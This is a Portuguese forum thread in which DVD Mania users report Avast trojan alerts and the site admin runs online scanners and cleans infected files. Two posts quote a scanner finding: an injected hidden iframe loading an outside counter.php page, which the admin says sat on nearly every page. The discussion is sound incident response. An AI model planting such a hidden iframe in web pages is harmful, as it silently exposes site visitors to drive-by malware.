Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Sugestões para melhorar o site. Indicação de erros e problemas com as páginas. Outros assuntos relacionados com a DVD Mania.
JoséMiguel
DVD Maníaco
DVD Maníaco
Posts: 3076
Joined: August 30th, 2011, 9:33 pm
Location: Lisboa

Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Post by JoséMiguel »

Tirei screenshot do alerta do Avast:
Image
User avatar
Rui Santos
Site Admin
Posts: 6161
Joined: June 4th, 2001, 11:42 pm
Location: Portugal - Lisboa / MAC
Contact:

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Post by Rui Santos »

Corri um scan online em: https://www.virustotal.com/ e não detectou nada.
No site: http://sitecheck.sucuri.net/results/forum.dvdmania.org
Aparece-me isto:
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwiframeenc1560
</HTML><iframe src="http://bordabehere.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

Que irei investigar um pouco mais tarde, assim que saia do trabalho.

E nestes: http://www.urlvoid.com/scan/dvdmania.co.pt/ / http://www.unmaskparasites.com/security-report/#report tb me aparece limpo.
Rui Santos - 54 Anos | 22 Anos DVDMania
DVD/BR | Jogos | Life is Short, Play More | FB Collectors HV-PT
User avatar
Rui Santos
Site Admin
Posts: 6161
Joined: June 4th, 2001, 11:42 pm
Location: Portugal - Lisboa / MAC
Contact:

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Post by Rui Santos »

Neste site, já vi algo apontado a um ficheiro, relacionado com o Tapatalk.
http://quttera.com/detailed_report/forum.dvdmania.org

Já é uma pista.
Rui Santos - 54 Anos | 22 Anos DVDMania
DVD/BR | Jogos | Life is Short, Play More | FB Collectors HV-PT
ruben
Especialista
Especialista
Posts: 1346
Joined: August 9th, 2009, 10:42 pm
Location: Lisboa

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Post by ruben »

Também uso Avast, apareceu-me o mesmo ontem.
User avatar
Rui Santos
Site Admin
Posts: 6161
Joined: June 4th, 2001, 11:42 pm
Location: Portugal - Lisboa / MAC
Contact:

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Post by Rui Santos »

Amigos, parece-me que limpei todos os ficheiro.
Os sites online de verificação, estão com uma cópia de cache... logo não estão a dar neste momento.

Podiam sff apagar a cache dos vossos pcs e tentar novamente a ver se ainda dá o aviso? Obrigada.
Rui Santos - 54 Anos | 22 Anos DVDMania
DVD/BR | Jogos | Life is Short, Play More | FB Collectors HV-PT
User avatar
Rui Santos
Site Admin
Posts: 6161
Joined: June 4th, 2001, 11:42 pm
Location: Portugal - Lisboa / MAC
Contact:

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Post by Rui Santos »

E tive a testar aqui... e está limpo.
http://siteinspector.comodo.com/public/reports/14254640

E aqui também
http://zulu.zscaler.com/

E neste ultimo que testa vários AV's tb limpo.
http://vscan.novirusthanks.org/analysis ... /aW5kZXg=/

Por isso a bola está do vosso lado.
Um pequena investigação que fiz, é que o fórum já tinha esse link há algum tempo, não tinha nada a ver com o Tapatalk. Nem acho que seja um virus, é mais uma risco potencial provocado pelo comando acima indicado. Essa linha foi agora removida manualmente de todos os ficheiros do fórum. (por isso devem-me 1 horinha de "trabalho" ;)
Rui Santos - 54 Anos | 22 Anos DVDMania
DVD/BR | Jogos | Life is Short, Play More | FB Collectors HV-PT
JoséMiguel
DVD Maníaco
DVD Maníaco
Posts: 3076
Joined: August 30th, 2011, 9:33 pm
Location: Lisboa

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Post by JoséMiguel »

Bem, no caso do Avast, a infecção reportada é apenas no ícone do DVD Mania (ver o meu screenshot). Existe uma espécie de "Mito Urbano" / Urban Legend, de que uma imagem pode ter um vírus. Pessoalmente não acredito nisso, porque uma imagem é apenas uma imagem, que quando é lida por uma aplicação externa apenas se dá a substituição de zeros e uns, por coordenadas e cores de pixeis. Se o "favicon.ico" tem lá código de vírus, não vejo como ele possa ser executado, em condições normais. A não ser que já exista uma outra infecção, que o vá buscar. Como icone/imagem por si só, não vejo ameaça.

No meu caso o Avast já marcou o ficheiro como "ameaça", e julgo que limpando o cache do firefox não fará a desmarcação.

Rui, descobriste alguma coisa acerca do ícone? Se foi alterado recentemente ou assim? Já o substituíste por uma versão de backup?
User avatar
Rui Santos
Site Admin
Posts: 6161
Joined: June 4th, 2001, 11:42 pm
Location: Portugal - Lisboa / MAC
Contact:

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Post by Rui Santos »

Não verifiquei o icon, apontei com os scans online para o comando:
"</HTML><iframe src="http://bordabehere.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>" que estava em quase todas as páginas do dvdmania.
Do que vi nos scans online que fiz, apontavam todos para o site acima referido.

Em relação às imagens não as validei, mas aqui no fórum são as do pacote standard... e como instalei recentemente uma nova versão do software do fórum é fácil verificar se as mesmas foram modificadas. (Mas não me cheira...)
Logo à noite valido, pq estou no trabalho.

Limpar a cache obriga o teu browser a fazer um novo carregamento completo da página, ou em alternativa usa o modo incognito ou privado e abre o site. (julgo que nesses modos quer o FF quer o Chroome não usam a cache)
Rui Santos - 54 Anos | 22 Anos DVDMania
DVD/BR | Jogos | Life is Short, Play More | FB Collectors HV-PT
ruben
Especialista
Especialista
Posts: 1346
Joined: August 9th, 2009, 10:42 pm
Location: Lisboa

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Post by ruben »

Aparece á mesma, será só com o Avast!
User avatar
Rui Santos
Site Admin
Posts: 6161
Joined: June 4th, 2001, 11:42 pm
Location: Portugal - Lisboa / MAC
Contact:

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Post by Rui Santos »

Pequeno update.
O servidor não tem esse ficheiro (ou pelo menos eu não encontro esse ficheiro em qq pasta).
E entrando pelo link relatado, http://forum.dvdmania.org/favicon.ico não se encontra nada.

Os scans online que corro agora ainda me dão o mesmo erro, mas ao verificar os ficheiros estes estão limpos. (pode ser algo a ver com a cache que eles tenham do servidor, e como referi apenas 2 apontam para infecção por malware).
Grande parte dos scans online indicam tudo como limpo. (tenho publicado tudo neste tópico)

Uma pesquisa por favicon.ico aparecem algumas coisas relatadas, mas têm mais a ver com o pc do que com os servidor.
Ruben e José Miguel podia dar uma vista de olhos no link http://uktsupport.ipbhost.com/index.php?showtopic=13530 e tentar verificar se resolve?
(Podiam tb caso não resolva clicar mais detalhes e tirar um print screen), e dizerem-me o browser que usam e versão.

Já agora o favicon, é o icon do fórum que aparece na barra de endereço. Que eu me lembre este fórum nunca teve esse icon. Apenas me aparece ocasionalmente (e sobretudo desde o recente problema de dns) um icon que associei ao problema do dns. Quando o encontrar posto aqui :)
Rui Santos - 54 Anos | 22 Anos DVDMania
DVD/BR | Jogos | Life is Short, Play More | FB Collectors HV-PT
JoséMiguel
DVD Maníaco
DVD Maníaco
Posts: 3076
Joined: August 30th, 2011, 9:33 pm
Location: Lisboa

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Post by JoséMiguel »

Realmente o ficheiro referido do favicon.ico não existe no servidor, tentei fazer download (file not found) e usei um site scanner que não diz que o ficheito não existe.

A seguir entrei com o Google Chrome no dvd mania pela 1ª vez na vida (so uso o chrome para traduzir sites), e o avast deu exactamente o mesmo alerta, que deu no firefox:

Detalhes da Infecção
URL: http://forum.dvdmania.org/favicon.ico
Processo: C:\Program Files (x86)\Google\Chrome\App...
Infecção: HTML:Iframe-ZG [Trj]

Clickando em detalhes durante o alerta, não dá mais informação que a apresentada acima.

Este online scanner dá alerta de virus para o dvd mania, mesma infecção

http://sitecheck.sucuri.net/results/forum.dvdmania.org

infecção em:

Malware found in the URL:
http://forum.dvdmania.org/404javascript.js <-- Este confirmei que existe, e está infectado, tentei fazer download, e soou logo o alarme. Acho que não é preciso javascript para gerir erros 404 de ficheiros não encontrados

e :

Malware found in the URL:
http://forum.dvdmania.org/404testpage4525d2fdc
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwiframeenc1560
</HTML><iframe src="http://bordabehere.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

Discussão no fórum oficial do Avast de outros web sites com a mesma infecção reportada:

http://forum.avast.com/index.php?topic=120485.0
JoséMiguel
DVD Maníaco
DVD Maníaco
Posts: 3076
Joined: August 30th, 2011, 9:33 pm
Location: Lisboa

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Post by JoséMiguel »

Portanto parece que o problema são esses 2 ficheiros começados por 404 na raíz do fórum.
User avatar
Rui Santos
Site Admin
Posts: 6161
Joined: June 4th, 2001, 11:42 pm
Location: Portugal - Lisboa / MAC
Contact:

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Post by Rui Santos »

Ok, obrigada.
Logo à noite volto a dar notícias.
Rui Santos - 54 Anos | 22 Anos DVDMania
DVD/BR | Jogos | Life is Short, Play More | FB Collectors HV-PT
ruben
Especialista
Especialista
Posts: 1346
Joined: August 9th, 2009, 10:42 pm
Location: Lisboa

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Post by ruben »

A mim não me apareceu mais o aviso de virus desde há 2 dias, não sei se voltará a aparecer
User avatar
Rui Santos
Site Admin
Posts: 6161
Joined: June 4th, 2001, 11:42 pm
Location: Portugal - Lisboa / MAC
Contact:

Re: Virus do tipo Cavalo de Troia no site do fórum DVD Mania

Post by Rui Santos »

Estive a tentar ver esses ficheiros e não os encontro, nem no servidor, nem clicando nos links que deixaste José.
Aparece-me sempre esta mensagem quando clico nos links.
Not Found
The requested document was not found on this server.

Web Server at dvdmania.co.pt


Mais, não os encontro em nenhuma das cópias que agora tenho aqui como cópia de segurança do servidor.
Entretanto ao pesquisar por esse javascript, encontrei mais um scan que corri e está limpo.
http://urlquery.net/report.php?id=2698455
Rui Santos - 54 Anos | 22 Anos DVDMania
DVD/BR | Jogos | Life is Short, Play More | FB Collectors HV-PT
Post Reply